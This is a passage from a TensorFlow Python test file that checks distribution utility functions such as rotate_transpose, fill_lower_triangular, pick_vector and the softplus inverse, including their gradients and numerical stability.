self.assertFalse(\n distribution_util.same_dynamic_shape(vector, multidimensional1).eval({\n multidimensional1: [[2.0, 3.0], [3.0, 4.0]]\n }))\n self.assertFalse(\n distribution_util.same_dynamic_shape(vector1, multidimensional1).eval(\n {\n vector1: [2.0, 3.0, 4.0],\n multidimensional1: [[2.0, 3.0], [3.0, 4.0]]\n }))\n\n # Multidimensional, X\n self.assertFalse(\n distribution_util.same_dynamic_shape(\n multidimensional, multidimensional1).eval({\n multidimensional1: [[1.0, 3.5, 5.0], [6.3, 2.3, 7.1]]\n }))\n self.assertFalse(\n distribution_util.same_dynamic_shape(\n multidimensional1, multidimensional2).eval({\n multidimensional1: [[2.0, 3.0], [3.0, 4.0]],\n multidimensional2: [[1.0, 3.5, 5.0], [6.3, 2.3, 7.1]]\n }))\n\n\nclass RotateTransposeTest(test.TestCase):\n\n def _np_rotate_transpose(self, x, shift):\n if not isinstance(x, np.ndarray):\n x = np.array(x)\n return np.transpose(x, np.roll(np.arange(len(x.shape)), shift))\n\n def testRollStatic(self):\n with self.test_session():\n with self.assertRaisesRegexp(ValueError, \"None values not supported.\"):\n distribution_util.rotate_transpose(None, 1)\n for x in (np.ones(1), np.ones((2, 1)), np.ones((3, 2, 1))):\n for shift in np.arange(-5, 5):\n y = distribution_util.rotate_transpose(x, shift)\n self.assertAllEqual(self._np_rotate_transpose(x, shift), y.eval())\n self.assertAllEqual(np.roll(x.shape, shift), y.get_shape().as_list())\n\n def testRollDynamic(self):\n with self.test_session() as sess:\n x = array_ops.placeholder(dtypes.float32)\n shift = array_ops.placeholder(dtypes.int32)\n for x_value in (np.ones(\n 1, dtype=x.dtype.as_numpy_dtype()), np.ones(\n (2, 1), dtype=x.dtype.as_numpy_dtype()), np.ones(\n (3, 2, 1), dtype=x.dtype.as_numpy_dtype())):\n for shift_value in np.arange(-5, 5):\n self.assertAllEqual(\n self._np_rotate_transpose(x_value, shift_value),\n sess.run(distribution_util.rotate_transpose(x, shift),\n feed_dict={x: x_value,\n shift: shift_value}))\n\n\nclass PickVectorTest(test.TestCase):\n\n def testCorrectlyPicksVector(self):\n with self.test_session():\n x = np.arange(10, 12)\n y = np.arange(15, 18)\n self.assertAllEqual(x,\n distribution_util.pick_vector(\n math_ops.less(0, 5), x, y).eval())\n self.assertAllEqual(y,\n distribution_util.pick_vector(\n math_ops.less(5, 0), x, y).eval())\n self.assertAllEqual(x,\n 
distribution_util.pick_vector(\n constant_op.constant(True), x, y)) # No eval.\n self.assertAllEqual(y,\n distribution_util.pick_vector(\n constant_op.constant(False), x, y)) # No eval.\n\n\nclass FillLowerTriangularTest(test.TestCase):\n\n def setUp(self):\n self._rng = np.random.RandomState(42)\n\n def _fill_lower_triangular(self, x):\n \"\"\"Numpy implementation of `fill_lower_triangular`.\"\"\"\n x = np.asarray(x)\n d = x.shape[-1]\n # d = n(n+1)/2 implies n is:\n n = int(0.5 * (np.sqrt(1. + 8. * d) - 1.))\n ids = np.tril_indices(n)\n y = np.zeros(list(x.shape[:-1]) + [n, n], dtype=x.dtype)\n y[..., ids[0], ids[1]] = x\n return y\n\n def testCorrectlyMakes1x1LowerTril(self):\n with self.test_session():\n x = ops.convert_to_tensor(self._rng.randn(3, 1))\n expected = self._fill_lower_triangular(tensor_util.constant_value(x))\n actual = distribution_util.fill_lower_triangular(x, validate_args=True)\n self.assertAllEqual(expected.shape, actual.get_shape())\n self.assertAllEqual(expected, actual.eval())\n\n def testCorrectlyMakesNoBatchLowerTril(self):\n with self.test_session():\n x = ops.convert_to_tensor(self._rng.randn(10))\n expected = self._fill_lower_triangular(tensor_util.constant_value(x))\n actual = distribution_util.fill_lower_triangular(x, validate_args=True)\n self.assertAllEqual(expected.shape, actual.get_shape())\n self.assertAllEqual(expected, actual.eval())\n g = gradients_impl.gradients(\n distribution_util.fill_lower_triangular(x), x)\n self.assertAllEqual(np.tri(4).reshape(-1), g[0].values.eval())\n\n def testCorrectlyMakesBatchLowerTril(self):\n with self.test_session():\n x = ops.convert_to_tensor(self._rng.randn(2, 2, 6))\n expected = self._fill_lower_triangular(tensor_util.constant_value(x))\n actual = distribution_util.fill_lower_triangular(x, validate_args=True)\n self.assertAllEqual(expected.shape, actual.get_shape())\n self.assertAllEqual(expected, actual.eval())\n self.assertAllEqual(\n np.ones((2, 2, 6)),\n gradients_impl.gradients(\n distribution_util.fill_lower_triangular(x), x)[0].eval())\n\n\nclass GenNewSeedTest(test.TestCase):\n\n def testOnlyNoneReturnsNone(self):\n self.assertFalse(distribution_util.gen_new_seed(0, \"salt\") is None)\n self.assertTrue(distribution_util.gen_new_seed(None, \"salt\") is None)\n\n\n# TODO(jvdillon): Merge this test back into:\n# tensorflow/python/kernel_tests/softplus_op_test.py\n# once TF core is accepting new ops.\nclass SoftplusTest(test.TestCase):\n\n def _npSoftplus(self, np_features):\n np_features = np.asarray(np_features)\n zero = np.asarray(0).astype(np_features.dtype)\n return np.logaddexp(zero, np_features)\n\n def _testSoftplus(self, np_features, use_gpu=False):\n np_features = np.asarray(np_features)\n np_softplus = self._npSoftplus(np_features)\n with self.test_session(use_gpu=use_gpu) as sess:\n softplus = nn_ops.softplus(np_features)\n softplus_inverse = distribution_util.softplus_inverse(softplus)\n [tf_softplus, tf_softplus_inverse] = sess.run([\n softplus, softplus_inverse])\n self.assertAllCloseAccordingToType(np_softplus, tf_softplus)\n rtol = {\"float16\": 0.07, \"float32\": 0.003, \"float64\": 0.002}.get(\n str(np_features.dtype), 1e-6)\n # This will test that we correctly computed the inverse by verifying we\n # recovered the original input.\n self.assertAllCloseAccordingToType(\n np_features, tf_softplus_inverse,\n atol=0., rtol=rtol)\n self.assertAllEqual(np.ones_like(tf_softplus).astype(np.bool),\n tf_softplus > 0)\n\n self.assertShapeEqual(np_softplus, softplus)\n 
self.assertShapeEqual(np_softplus, softplus_inverse)\n\n    self.assertAllEqual(np.ones_like(tf_softplus).astype(np.bool),\n                        np.isfinite(tf_softplus))\n    self.assertAllEqual(np.ones_like(tf_softplus_inverse).astype(np.bool),\n                        np.isfinite(tf_softplus_inverse))\n\n  def testNumbers(self):\n    for t in [np.float16, np.float32, np.float64]:\n      lower = {np.float16: -15, np.float32: -50, np.float64: -50}.get(t, -100)\n      upper = {np.float16: 50, np.float32: 50, np.float64: 50}.get(t, 100)\n      self._testSoftplus(\n          np.array(np.linspace(lower, upper, int(1e3)).astype(t)).reshape(\n              [2, -1]),\n          use_gpu=False)\n      self._testSoftplus(\n          np.array(np.linspace(lower, upper, int(1e3)).astype(t)).reshape(\n              [2, -1]),\n          use_gpu=True)\n      log_eps = np.log(np.finfo(t).eps)\n      one = t(1)\n      ten = t(10)\n      self._testSoftplus(\n          [\n              log_eps, log_eps - one, log_eps + one, log_eps - ten,\n              log_eps + ten, -log_eps, -log_eps - one, -log_eps + one,\n              -log_eps - ten, -log_eps + ten\n          ],\n          use_gpu=False)\n      self._testSoftplus(\n          [\n              log_eps, log_eps - one, log_eps + one, log_eps - ten,\n              log_eps + ten, -log_eps, -log_eps - one, -log_eps + one,\n              -log_eps - ten, -log_eps + ten\n          ],\n          use_gpu=True)\n\n  def testGradient(self):\n    with self.test_session():\n      x = constant_op.constant(\n          [-0.9, -0.7, -0.5, -0.3, -0.1, 0.1, 0.3, 0.5, 0.7, 0.9],\n          shape=[2, 5],\n          name=\"x\")\n      y = nn_ops.softplus(x, name=\"softplus\")\n      x_init = np.asarray(\n          [[-0.9, -0.7, -0.5, -0.3, -0.1], [0.1, 0.3, 0.5, 0.7, 0.9]],\n          dtype=np.float32,\n          order=\"F\")\n      err = gradient_checker.compute_gradient_error(\n          x, [2, 5], y, [2, 5], x_init_value=x_init)\n      tf_logging.vlog(2, \"softplus (float) gradient err = \", err)\n      self.assertLess(err, 1e-4)\n\n  def testInverseSoftplusGradientNeverNan(self):\n    with self.test_session():\n      # Note that this range contains both zero and inf.\n      x = constant_op.constant(np.logspace(-8, 6).astype(np.float16))\n      y = distribution_util.softplus_inverse(x)\n      grads = gradients_impl.gradients(y, x)[0].eval()\n      # Equivalent to `assertAllFalse` (if it existed).\n      self.assertAllEqual(np.zeros_like(grads).astype(np.bool), np.isnan(grads))\n\n  def testInverseSoftplusGradientFinite(self):\n    with self.test_session():\n      # This range of x is all finite, and so is 1 / x. So the\n      # gradient and its approximations should be finite as well.\n      x = constant_op.constant(np.logspace(-4.8, 4.5).astype(np.float16))\n      y = distribution_util.softplus_inverse(x)\n      grads = gradients_impl.gradients(y, x)[0].eval()\n      # Equivalent to `assertAllTrue` (if it existed).\n      self.assertAllEqual(\n          np.ones_like(grads).astype(np.bool), np.isfinite(grads))\n\n\nif __name__ == \"__main__\":\n  test.main()\n","repo_name":"baidu-research/tensorflow-allreduce","sub_path":"tensorflow/python/kernel_tests/distributions/util_test.py","file_name":"util_test.py","file_ext":"py","file_size_in_byte":27169,"program_lang":"python","lang":"en","doc_type":"code","stars":372,"dataset":"github-code","pt":"3"}